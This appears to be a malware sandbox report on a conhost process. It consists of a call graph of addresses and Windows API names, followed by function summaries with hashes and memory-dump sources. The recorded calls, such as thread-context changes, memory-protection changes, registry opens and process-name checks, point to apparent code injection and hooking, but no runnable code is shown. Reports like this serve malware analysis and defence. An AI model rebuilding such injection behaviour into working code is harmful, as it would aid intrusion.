2408a299dce RtlLookupFunctionEntry 9071->9073 9072->8999 9073->9071 9075 2408a299c9e 9074->9075 9076 2408a299ccb 9075->9076 9077 2408a299a64 __CxxCallCatchBlock 9 API calls 9075->9077 9076->9002 9077->9075 9079 2408a29b869 __FrameHandler3::GetHandlerSearchState 9078->9079 9080 2408a299d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9079->9080 9081 2408a29b87e 9080->9081 9143 2408a29a4fc 9081->9143 9084 2408a29b890 __FrameHandler3::GetHandlerSearchState 9146 2408a29a534 9084->9146 9085 2408a29b8b3 9086 2408a29a4fc __GetUnwindTryBlock RtlLookupFunctionEntry 9085->9086 9087 2408a29a9d6 9086->9087 9087->9012 9087->9014 9087->9017 9090 2408a299a64 __CxxCallCatchBlock 9 API calls 9089->9090 9091 2408a29a162 9090->9091 9091->9012 9091->9045 9093 2408a29b9c3 9092->9093 9095 2408a29b907 9092->9095 9094 2408a29aaa2 9094->9014 9094->9060 9095->9094 9096 2408a29a128 9 API calls 9095->9096 9097 2408a29a114 Is_bad_exception_allowed 9 API calls 9095->9097 9098 2408a29b068 9 API calls 9095->9098 9096->9095 9097->9095 9098->9095 9101 2408a29b9e9 Is_bad_exception_allowed 9099->9101 9102 2408a29ba39 9099->9102 9100 2408a29a114 9 API calls Is_bad_exception_allowed 9100->9101 9101->9100 9101->9102 9102->9065 9104 2408a29b095 9103->9104 9115 2408a29b124 9103->9115 9105 2408a29a114 Is_bad_exception_allowed 9 API calls 9104->9105 9106 2408a29b09e 9105->9106 9107 2408a29a114 Is_bad_exception_allowed 9 API calls 9106->9107 9108 2408a29b0b7 9106->9108 9106->9115 9107->9108 9109 2408a29b0e3 9108->9109 9110 2408a29a114 Is_bad_exception_allowed 9 API calls 9108->9110 9108->9115 9111 2408a29a128 9 API calls 9109->9111 9110->9109 9112 2408a29b0f7 9111->9112 9113 2408a29b110 9112->9113 9114 2408a29a114 Is_bad_exception_allowed 9 API calls 9112->9114 9112->9115 9116 2408a29a128 9 API calls 9113->9116 9114->9113 9115->9039 9116->9115 9118 2408a299d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9117->9118 9119 2408a29a8dd 9118->9119 9120 2408a29a114 Is_bad_exception_allowed 9 API calls 9119->9120 9121 2408a29a915 9120->9121 9122 2408a299f80 9 API calls 9121->9122 9123 2408a29a959 9122->9123 9123->9039 9125 2408a299cf8 __FrameHandler3::GetHandlerSearchState 9124->9125 9126 2408a299c80 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9125->9126 9127 2408a299d02 9126->9127 9127->9029 9129 2408a297d70 _log10_special 8 API calls 9128->9129 9130 2408a29a07a 9129->9130 9130->9053 9132 2408a29ae82 9131->9132 9137 2408a29aef0 9131->9137 9133 2408a299a64 __CxxCallCatchBlock 9 API calls 9132->9133 9134 2408a29ae87 9133->9134 9135 2408a29ae96 EncodePointer 9134->9135 9142 2408a29aeec 9134->9142 9136 2408a299a64 __CxxCallCatchBlock 9 API calls 9135->9136 9138 2408a29aea6 9136->9138 9137->9053 9138->9142 9149 2408a299c2c 9138->9149 9140 2408a29a114 9 API calls Is_bad_exception_allowed 9140->9142 9141 2408a29a8a0 19 API calls 9141->9142 9142->9137 9142->9140 9142->9141 9144 2408a299d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9143->9144 9145 2408a29a50f 9144->9145 9145->9084 9145->9085 9147 2408a299d74 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9146->9147 9148 2408a29a54e 9147->9148 9148->9087 9150 2408a299a64 __CxxCallCatchBlock 9 API calls 9149->9150 9151 2408a299c58 9150->9151 9151->9142 9152 2408a292fac 9153 2408a292fd3 9152->9153 9154 2408a2930a0 9153->9154 9155 2408a292ff0 PdhGetCounterInfoW 9153->9155 9155->9154 9156 2408a293012 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9155->9156 9157 2408a29308c GetProcessHeap HeapFree 9156->9157 9158 2408a293044 StrCmpW 9156->9158 9157->9154 9158->9157 9160 2408a293059 9158->9160 9159 2408a293554 12 API calls 9159->9160 9160->9157 9160->9159 8732 2408a29f72c 8733 2408a29f76b 8732->8733 8734 2408a29f74e 8732->8734 8736 2408a29f775 8733->8736 8741 2408a2a1ee8 8733->8741 8734->8733 8735 2408a29f75c 8734->8735 8737 2408a29dadc __std_exception_copy 11 API calls 8735->8737 8748 2408a2a1f24 8736->8748 8739 2408a29f761 8737->8739 8742 2408a2a1f0a HeapSize 8741->8742 8743 2408a2a1ef1 8741->8743 8744 2408a29dadc __std_exception_copy 11 API calls 8743->8744 8745 2408a2a1ef6 8744->8745 8746 2408a29d9a0 _invalid_parameter_noinfo 49 API calls 8745->8746 8747 2408a2a1f01 8746->8747 8747->8736 8749 2408a2a1f39 8748->8749 8750 2408a2a1f43 8748->8750 8751 2408a29ce3c 12 API calls 8749->8751 8752 2408a2a1f48 8750->8752 8758 2408a2a1f4f _invalid_parameter_noinfo 8750->8758 8756 2408a2a1f41 8751->8756 8753 2408a29db74 __free_lconv_mon 11 API calls 8752->8753 8753->8756 8754 2408a2a1f82 HeapReAlloc 8754->8756 8754->8758 8755 2408a2a1f55 8757 2408a29dadc __std_exception_copy 11 API calls 8755->8757 8756->8739 8757->8756 8758->8754 8758->8755 8759 2408a29bc8c _invalid_parameter_noinfo 2 API calls 8758->8759 8759->8758 9359 2408a2a522d 9360 2408a29a0c0 __CxxCallCatchBlock 9 API calls 9359->9360 9364 2408a2a5240 9360->9364 9361 2408a2a527f __CxxCallCatchBlock 9362 2408a299a64 __CxxCallCatchBlock 9 API calls 9361->9362 9363 2408a2a5293 9362->9363 9365 2408a299a64 __CxxCallCatchBlock 9 API calls 9363->9365 9364->9361 9366 2408a299750 __CxxCallCatchBlock 9 API calls 9364->9366 9367 2408a2a52a3 9365->9367 9366->9361 8760 2408a296120 8761 2408a29612d 8760->8761 8762 2408a296139 8761->8762 8767 2408a29624a 8761->8767 8763 2408a2961bd 8762->8763 8764 2408a296196 SetThreadContext 8762->8764 8764->8763 8765 2408a29632e 8768 2408a29634e 8765->8768 8770 2408a294810 VirtualFree 8765->8770 8766 2408a296271 VirtualProtect FlushInstructionCache 8766->8767 8767->8765 8767->8766 8769 2408a295220 3 API calls 8768->8769 8773 2408a296353 8769->8773 8770->8768 8771 2408a2963a7 8774 2408a297d70 _log10_special 8 API calls 8771->8774 8772 2408a296367 ResumeThread 8772->8773 8773->8771 8773->8772 8775 2408a2963ef 8774->8775 9368 2408a2a0020 9371 2408a29ffd8 9368->9371 9376 2408a29cdcc EnterCriticalSection 9371->9376 9161 2408a29bfa1 9162 2408a29cad8 23 API calls 9161->9162 9163 2408a29bfa6 9162->9163 9164 2408a29bfcd GetModuleHandleW 9163->9164 9165 2408a29c017 9163->9165 9164->9165 9171 2408a29bfda 9164->9171 9178 2408a29bea4 9165->9178 9171->9165 9173 2408a29c0c8 GetModuleHandleExW 9171->9173 9174 2408a29c0fc GetProcAddress 9173->9174 9175 2408a29c10e 9173->9175 9174->9175 9176 2408a29c12a FreeLibrary 9175->9176 9177 2408a29c131 9175->9177 9176->9177 9177->9165 9192 2408a29cdcc EnterCriticalSection 9178->9192 9203 2408a2a07b8 9204 2408a2a07c3 9203->9204 9212 2408a2a30b8 9204->9212 9225 2408a29cdcc EnterCriticalSection 9212->9225 8093 2408a295cbc 8094 2408a295cc3 8093->8094 8095 2408a295cf0 VirtualProtect 8094->8095 8097 2408a295c00 8094->8097 8096 2408a295d19 GetLastError 8095->8096 8095->8097 8096->8097 8098 2408a2930bc 8099 2408a2930ec 8098->8099 8100 2408a2931a5 8099->8100 8101 2408a293109 PdhGetCounterInfoW 8099->8101 8101->8100 8102 2408a293127 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8101->8102 8103 2408a293159 StrCmpW 8102->8103 8104 2408a293191 GetProcessHeap HeapFree 8102->8104 8103->8104 8105 2408a29316e 8103->8105 8104->8100 8105->8104 8107 2408a293554 StrCmpNW 8105->8107 8108 2408a293586 StrStrW 8107->8108 8110 2408a2935f6 8107->8110 8109 2408a29359f StrToIntW 8108->8109 8108->8110 8109->8110 8111 2408a2935c7 8109->8111 8110->8105 8111->8110 8117 2408a291934 OpenProcess 8111->8117 8118 2408a291968 K32GetModuleFileNameExW 8117->8118 8119 2408a2919ba 8117->8119 8120 2408a2919b1 CloseHandle 8118->8120 8121 2408a291982 PathFindFileNameW lstrlenW 8118->8121 8119->8110 8123 2408a293c74 8119->8123 8120->8119 8121->8120 8122 2408a2919a0 StrCpyW 8121->8122 8122->8120 8124 2408a2935e8 8123->8124 8125 2408a293c81 StrCmpNIW 8123->8125 8124->8110 8126 2408a291c00 8124->8126 8125->8124 8127 2408a291c17 8126->8127 8129 2408a291c20 8126->8129 8128 2408a29152c 2 API calls 8127->8128 8128->8129 8129->8110 8130 2408a29febc 8133 2408a29fec8 8130->8133 8132 2408a29feef 8133->8132 8134 2408a2a20ec 8133->8134 8135 2408a2a20f1 8134->8135 8139 2408a2a212c 8134->8139 8136 2408a2a2112 DeleteCriticalSection 8135->8136 8137 2408a2a2124 8135->8137 8136->8136 8136->8137 8138 2408a29db74 __free_lconv_mon 11 API calls 8137->8138 8138->8139 8139->8133 9226 2408a29c9bc 9227 2408a29c9ed 9226->9227 9228 2408a29c9d5 9226->9228 9228->9227 9229 2408a29db74 __free_lconv_mon 11 API calls 9228->9229 9229->9227 8787 2408a29b53e 8788 2408a299a64 __CxxCallCatchBlock 9 API calls 8787->8788 8790 2408a29b54b __CxxCallCatchBlock 8788->8790 8789 2408a29b58f RaiseException 8791 2408a29b5b6 8789->8791 8790->8789 8792 2408a29a0c0 __CxxCallCatchBlock 9 API calls 8791->8792 8796 2408a29b5be 8792->8796 8793 2408a29b5e7 __CxxCallCatchBlock 8794 2408a299a64 __CxxCallCatchBlock 9 API calls 8793->8794 8795 2408a29b5fa 8794->8795 8797 2408a299a64 __CxxCallCatchBlock 9 API calls 8795->8797 8796->8793 8799 2408a299750 __CxxCallCatchBlock 9 API calls 8796->8799 8798 2408a29b603 8797->8798 8799->8793 8140 2408a2a52b3 8143 2408a2997a4 8140->8143 8144 2408a2997bc 8143->8144 8145 2408a2997ce 8143->8145 8144->8145 8146 2408a2997c4 8144->8146 8147 2408a299a64 __CxxCallCatchBlock 9 API calls 8145->8147 8148 2408a2997cc 8146->8148 8150 2408a299a64 __CxxCallCatchBlock 9 API calls 8146->8150 8149 2408a2997d3 8147->8149 8149->8148 8151 2408a299a64 __CxxCallCatchBlock 9 API calls 8149->8151 8152 2408a2997f3 8150->8152 8151->8148 8153 2408a299a64 __CxxCallCatchBlock 9 API calls 8152->8153 8154 2408a299800 8153->8154 8159 2408a29cad8 8154->8159 8160 2408a29d258 _invalid_parameter_noinfo 23 API calls 8159->8160 8161 2408a29cae1 8160->8161 9377 2408a299435 9379 2408a299448 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 9377->9379 9378 2408a299539 9379->9378 9380 2408a299504 RtlUnwindEx 9379->9380 9380->9379 8800 2408a292334 GetProcessIdOfThread GetCurrentProcessId 8801 2408a2923da 8800->8801 8802 2408a29235f CreateFileW 8800->8802 8802->8801 8803 2408a292393 WriteFile ReadFile CloseHandle 8802->8803 8803->8801 9381 2408a2a5208 9384 2408a29b630 9381->9384 9385 2408a29b6a0 9384->9385 9386 2408a29b64f 9384->9386 9386->9385 9387 2408a299a64 __CxxCallCatchBlock 9 API calls 9386->9387 9387->9385 8804 2408a297f0c 8811 2408a29968c 8804->8811 8807 2408a297f19 8812 2408a299a80 __CxxCallCatchBlock 9 API calls 8811->8812 8813 2408a297f15 8812->8813 8813->8807 8814 2408a29ca6c 8813->8814 8815 2408a29d3d0 __std_exception_copy 11 API calls 8814->8815 8816 2408a297f22 8815->8816 8816->8807 8817 2408a2996a0 8816->8817 8820 2408a299a1c 8817->8820 8819 2408a2996a9 8819->8807 8821 2408a299a2d 8820->8821 8825 2408a299a42 __std_exception_destroy 8820->8825 8822 2408a29a3d4 __CxxCallCatchBlock 6 API calls 8821->8822 8823 2408a299a32 8822->8823 8826 2408a29a41c 8823->8826 8825->8819 8827 2408a29a1f4 __vcrt_FlsAlloc 5 API calls 8826->8827 8828 2408a29a44a 8827->8828 8829 2408a29a45c TlsSetValue 8828->8829 8830 2408a29a454 8828->8830 8829->8830 8830->8825 8162 2408a29fe80 8173 2408a29cdcc EnterCriticalSection 8162->8173 8174 2408a2a5081 __scrt_dllmain_exception_filter 9388 2408a292604 9390 2408a292683 9388->9390 9389 2408a292872 9390->9389 9391 2408a2926e5 GetFileType 9390->9391 9392 2408a292709 9391->9392 9393 2408a2926f3 StrCpyW 9391->9393 9395 2408a2919d8 4 API calls 9392->9395 9394 2408a292718 9393->9394 9398 2408a292722 9394->9398 9402 2408a2927c7 9394->9402 9395->9394 9396 2408a293c74 StrCmpNIW 9396->9398 9397 2408a293c74 StrCmpNIW 9397->9402 9398->9389 9398->9396 9399 2408a29330c 4 API calls 9398->9399 9400 2408a291cd8 2 API calls 9398->9400 9399->9398 9400->9398 9401 2408a29330c 4 API calls 9401->9402 9402->9389 9402->9397 9402->9401 9403 2408a291cd8 2 API calls 9402->9403 9403->9402 8175 2408a29f484 GetCommandLineA GetCommandLineW 9230 2408a29cd84 9231 2408a29cd8c 9230->9231 9232 2408a29fa3c 6 API calls 9231->9232 9233 2408a29cdbd 9231->9233 9234 2408a29cdb9 9231->9234 9232->9231 9236 2408a29cde8 9233->9236 9237 2408a29ce13 9236->9237 9238 2408a29cdf6 DeleteCriticalSection 9237->9238 9239 2408a29ce17 9237->9239 9238->9237 9239->9234 9240 2408a298386 9241 2408a299818 __std_exception_copy 49 API calls 9240->9241 9242 2408a2983b1 9241->9242 8176 2408a2a0698 8177 2408a2a06c2 8176->8177 8178 2408a29dafc _invalid_parameter_noinfo 11 API calls 8177->8178 8179 2408a2a06e1 8178->8179 8180 2408a29db74 __free_lconv_mon 11 API calls 8179->8180 8181 2408a2a06ef 8180->8181 8182 2408a29dafc _invalid_parameter_noinfo 11 API calls 8181->8182 8186 2408a2a0719 8181->8186 8183 2408a2a070b 8182->8183 8185 2408a29db74 __free_lconv_mon 11 API calls 8183->8185 8185->8186 8187 2408a2a0722 8186->8187 8188 2408a29fa3c 8186->8188 8193 2408a29f7c4 8188->8193 8191 2408a29fa91 InitializeCriticalSectionAndSpinCount 8192 2408a29fa77 8191->8192 8192->8186 8194 2408a29f821 8193->8194 8200 2408a29f81c __vcrt_FlsAlloc 8193->8200 8194->8191 8194->8192 8195 2408a29f851 LoadLibraryExW 8197 2408a29f926 8195->8197 8198 2408a29f876 GetLastError 8195->8198 8196 2408a29f946 GetProcAddress 8196->8194 8197->8196 8199 2408a29f93d FreeLibrary 8197->8199 8198->8200 8199->8196 8200->8194 8200->8195 8200->8196 8201 2408a29f8b0 LoadLibraryExW 8200->8201 8201->8197 8201->8200 8831 2408a29211c 8832 2408a29214d 8831->8832 8833 2408a292263 8832->8833 8839 2408a29222e 8832->8839 8841 2408a292171 8832->8841 8834 2408a292268 8833->8834 8835 2408a2922d7 8833->8835 8848 2408a2931cc GetProcessHeap HeapAlloc 8834->8848 8838 2408a2931cc 11 API calls 8835->8838 8835->8839 8837 2408a2921a9 StrCmpNIW 8837->8841 8838->8839 8841->8837 8841->8839 8842 2408a291c34 8841->8842 8843 2408a291cb8 8842->8843 8844 2408a291c5b GetProcessHeap HeapAlloc 8842->8844 8843->8841 8844->8843 8845 2408a291c96 8844->8845 8846 2408a291c00 2 API calls 8845->8846 8847 2408a291c9e GetProcessHeap HeapFree 8846->8847 8847->8843 8849 2408a29321f 8848->8849 8850 2408a2932dd GetProcessHeap HeapFree 8849->8850 8851 2408a2932d8 8849->8851 8852 2408a29326a StrCmpNIW 8849->8852 8853 2408a291c34 6 API calls 8849->8853 8850->8839 8851->8850 8852->8849 8853->8849 9404 2408a29fc1c 9405 2408a29fc55 9404->9405 9406 2408a29fc26 9404->9406 9406->9405 9407 2408a29fc3b FreeLibrary 9406->9407 9407->9406 9408 2408a294010 9409 2408a293f5d 9408->9409 9410 2408a293fad VirtualQuery 9409->9410 9411 2408a293fc7 9409->9411 9412 2408a294012 GetLastError 9409->9412 9410->9409 9410->9411 9412->9409 9412->9411 8202 2408a2a4e90 8212 2408a299418 8202->8212 8204 2408a2a4eb8 8206 2408a299a64 __CxxCallCatchBlock 9 API calls 8207 2408a2a4ec8 8206->8207 8208 2408a299a64 __CxxCallCatchBlock 9 API calls 8207->8208 8209 2408a2a4ed1 8208->8209 8210 2408a29cad8 23 API calls 8209->8210 8211 2408a2a4eda 8210->8211 8214 2408a299448 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8212->8214 8213 2408a299539 8213->8204 8213->8206 8214->8213 8215 2408a299504 RtlUnwindEx 8214->8215 8215->8214 9413 2408a2a4e10 9414 2408a2a4e48 __GSHandlerCheckCommon 9413->9414 9415 2408a2a4e74 9414->9415 9417 2408a29a16c 9414->9417 9418 2408a299a64 __CxxCallCatchBlock 9 API calls 9417->9418 9419 2408a29a196 9418->9419 9420 2408a299a64 __CxxCallCatchBlock 9 API calls 9419->9420 9421 2408a29a1a3 9420->9421 9422 2408a299a64 __CxxCallCatchBlock 9 API calls 9421->9422 9423 2408a29a1ac 9422->9423 9423->9415 8216 2408a29d094 8217 2408a29d099 8216->8217 8218 2408a29d0ae 8216->8218 8222 2408a29d0b4 8217->8222 8223 2408a29d0fe 8222->8223 8224 2408a29d0f6 8222->8224 8226 2408a29db74 __free_lconv_mon 11 API calls 8223->8226 8225 2408a29db74 __free_lconv_mon 11 API calls 8224->8225 8225->8223 8227 2408a29d10b 8226->8227 8228 2408a29db74 __free_lconv_mon 11 API calls 8227->8228 8229 2408a29d118 8228->8229 8230 2408a29db74 __free_lconv_mon 11 API calls 8229->8230 8231 2408a29d125 8230->8231 8232 2408a29db74 __free_lconv_mon 11 API calls 8231->8232 8233 2408a29d132 8232->8233 8234 2408a29db74 __free_lconv_mon 11 API calls 8233->8234 8235 2408a29d13f 8234->8235 8236 2408a29db74 __free_lconv_mon 11 API calls 8235->8236 8237 2408a29d14c 8236->8237 8238 2408a29db74 __free_lconv_mon 11 API calls 8237->8238 8239 2408a29d159 8238->8239 8240 2408a29db74 __free_lconv_mon 11 API calls 8239->8240 8241 2408a29d169 8240->8241 8242 2408a29db74 __free_lconv_mon 11 API calls 8241->8242 8243 2408a29d179 8242->8243 8248 2408a29cf64 8243->8248 8262 2408a29cdcc EnterCriticalSection 8248->8262 8854 2408a29c514 8855 2408a29c529 8854->8855 8856 2408a29c52d 8854->8856 8857 2408a29f0c0 69 API calls 8856->8857 8858 2408a29c532 8857->8858 8869 2408a29f61c GetEnvironmentStringsW 8858->8869 8861 2408a29c54b 8889 2408a29c588 8861->8889 8862 2408a29c53f 8863 2408a29db74 __free_lconv_mon 11 API calls 8862->8863 8863->8855 8866 2408a29db74 __free_lconv_mon 11 API calls 8867 2408a29c572 8866->8867 8868 2408a29db74 __free_lconv_mon 11 API calls 8867->8868 8868->8855 8870 2408a29f64c 8869->8870 8871 2408a29c537 8869->8871 8872 2408a29f53c WideCharToMultiByte 8870->8872 8871->8861 8871->8862 8873 2408a29f69d 8872->8873 8874 2408a29f6a4 FreeEnvironmentStringsW 8873->8874 8875 2408a29ce3c 12 API calls 8873->8875 8874->8871 8876 2408a29f6b7 8875->8876 8877 2408a29f6c8 8876->8877 8878 2408a29f6bf 8876->8878 8880 2408a29f53c WideCharToMultiByte 8877->8880 8879 2408a29db74 __free_lconv_mon 11 API calls 8878->8879 8881 2408a29f6c6 8879->8881 8882 2408a29f6eb 8880->8882 8881->8874 8883 2408a29f6f9 8882->8883 8884 2408a29f6ef 8882->8884 8885 2408a29db74 __free_lconv_mon 11 API calls 8883->8885 8886 2408a29db74 __free_lconv_mon 11 API calls 8884->8886 8887 2408a29f6f7 FreeEnvironmentStringsW 8885->8887 8886->8887 8887->8871 8890 2408a29c5ad 8889->8890 8891 2408a29dafc _invalid_parameter_noinfo 11 API calls 8890->8891 8892 2408a29c5e3 8891->8892 8894 2408a29c65e 8892->8894 8897 2408a29dafc _invalid_parameter_noinfo 11 API calls 8892->8897 8898 2408a29c64d 8892->8898 8900 2408a29cb18 __std_exception_copy 49 API calls 8892->8900 8903 2408a29c683 8892->8903 8904 2408a29db74 __free_lconv_mon 11 API calls 8892->8904 8905 2408a29c5eb 8892->8905 8893 2408a29db74 __free_lconv_mon 11 API calls 8896 2408a29c553 8893->8896 8895 2408a29db74 __free_lconv_mon 11 API calls 8894->8895 8895->8896 8896->8866 8897->8892 8908 2408a29c698 8898->8908 8900->8892 8902 2408a29db74 __free_lconv_mon 11 API calls 8902->8905 8906 2408a29d9c0 _invalid_parameter_noinfo 17 API calls 8903->8906 8904->8892 8905->8893 8907 2408a29c696 8906->8907 8909 2408a29c69d 8908->8909 8913 2408a29c655 8908->8913 8910 2408a29c6c6 8909->8910 8911 2408a29db74 __free_lconv_mon 11 API calls 8909->8911 8912 2408a29db74 __free_lconv_mon 11 API calls 8910->8912 8911->8909 8912->8913 8913->8902 9247 2408a2a5395 9248 2408a2a53a4 9247->9248 9250 2408a2a53ae 9247->9250 9251 2408a29ce20 LeaveCriticalSection 9248->9251

                                                                  Executed Functions

                                                                  Function 000002408A293620 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32 ref: 000002408A293639
                                                                  • PathFindFileNameW.SHLWAPI ref: 000002408A293648
                                                                    • Part of subcall function 000002408A293C74: StrCmpNIW.SHLWAPI(?,?,?,000002408A29254B), ref: 000002408A293C8C
                                                                    • Part of subcall function 000002408A293BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002408A29365F), ref: 000002408A293BCE
                                                                    • Part of subcall function 000002408A293BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002408A29365F), ref: 000002408A293BFC
                                                                    • Part of subcall function 000002408A293BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002408A29365F), ref: 000002408A293C1E
                                                                    • Part of subcall function 000002408A293BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002408A29365F), ref: 000002408A293C39
                                                                    • Part of subcall function 000002408A293BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002408A29365F), ref: 000002408A293C5A
                                                                  • CreateThread.KERNELBASE ref: 000002408A29368F
                                                                    • Part of subcall function 000002408A291D40: GetCurrentThread.KERNEL32 ref: 000002408A291D4B
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                  • String ID:
                                                                  • API String ID: 1683269324-0
                                                                  • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction ID: cffadbf7a1aeeb9ad8b150fc44a44c88a665792fad7b04cfd1a9a9a35c9222a9
                                                                  • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction Fuzzy Hash: 43118C3071470182FBB09B3BABCDBAB2AA1B794B15F48412D970681ED5DF78C0E98E04
                                                                  Function 0000024089942AC0 Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction ID: 0a9cd779f5ecb5ae187cfc18bba578c791e85146061aa3d595181445541c11bc
                                                                  • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction Fuzzy Hash: 57913572F0125087EB66EF19D68CB6DB391F754B98F548124DF8A0B788DA39D893C708
                                                                  Function 000002408A291AC8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 000002408A291628: GetProcessHeap.KERNEL32 ref: 000002408A291633
                                                                    • Part of subcall function 000002408A291628: HeapAlloc.KERNEL32 ref: 000002408A291642
                                                                    • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A2916B2
                                                                    • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A2916DF
                                                                    • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A2916F9
                                                                    • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A291719
                                                                    • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A291734
                                                                    • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A291754
                                                                    • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A29176F
                                                                    • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A29178F
                                                                    • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A2917AA
                                                                    • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A2917CA
                                                                  • SleepEx.KERNELBASE ref: 000002408A291AE3
                                                                    • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A2917E5
                                                                    • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A291805
                                                                    • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A291820
                                                                    • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A291840
                                                                    • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A29185B
                                                                    • Part of subcall function 000002408A291628: RegOpenKeyExW.ADVAPI32 ref: 000002408A29187B
                                                                    • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A291896
                                                                    • Part of subcall function 000002408A291628: RegCloseKey.ADVAPI32 ref: 000002408A2918A0
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                  • String ID:
                                                                  • API String ID: 948135145-0
                                                                  • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction ID: 2e7c0ef327f033da401da23f9b72094cb691cd4766ec6c6fd812f005b61ce3bf
                                                                  • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction Fuzzy Hash: 5D31CC7171060182FBB4DB2BD7E876B16A6AB84FD0F4C54219F0D87BD5EE34C8D18A50

                                                                  Non-executed Functions

                                                                  Function 000002408A292BF4 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
